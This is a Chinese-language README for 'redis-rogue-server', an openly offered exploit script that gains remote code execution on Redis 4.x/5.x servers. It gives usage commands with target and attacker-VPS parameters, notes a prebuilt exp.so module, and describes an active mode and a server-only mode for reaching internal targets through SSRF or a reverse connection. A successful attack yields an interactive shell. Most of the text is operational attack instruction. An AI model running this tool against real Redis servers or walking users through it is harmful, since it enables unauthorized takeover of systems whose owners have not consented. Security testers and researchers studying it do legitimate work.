Redis 4.x/Redis 5.x RCE利用脚本, 涉及技术点可参考 Redis post-exploitation.
经测试Redis 5.0.8也可以使用,没有出现ppt上写的5.0无法set/get config的情况.
编译.so模块, 代码: https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.
将.so与 redis-rogue-server.py放置在同一目录下
项目自带了一个编译好的的exp.so文件, 可直接使用
适用于目标Redis服务处于外网的情况
- 外网Redis未授权访问
- 已知外网Redis口令
启动redis rogue server,并主动连接目标redis服务发起攻击
python3 redis-rogue-server.py --rhost <target address> --rport <target port> --lhost <vps address> --lport <vps port>参数说明:
--rpasswd如果目标Redis服务开启了认证功能,可以通过该选项指定密码--rhost目标redis服务IP--rport目标redis服务端口,默认为6379--lhostvps的外网IP地址--lportvps监控的端口,默认为21000
攻击成功之后,你会得到一个交互式shell
适用于目标Redis服务处于内网的情况
- 通过SSRF攻击Redis
- 内网Redis未授权访问/已知Redis口令, Redis需要反向连接redis rogue server
这种情况下可以使用--server-only选项
python3 redis-rogue-server.py --server-only参数说明:
--server-only仅启动redis rogue server, 接受目标redis的连接,不主动发起连接
本项目为n0b0dyCN同名项目的fork, 在原项目代码基础之上修复了一些bug, 添加了一些新功能, 并针对不同漏洞利用场景做了一些优化。
因原作者删掉了原始repo, 所以直接挂到了我下面。
Redis Rogue Server 是 404Team 星链计划2.0中的一环,如果对Redis Rogue Server有任何疑问又或是想要找小伙伴交流,可以参考星链计划的加群方式。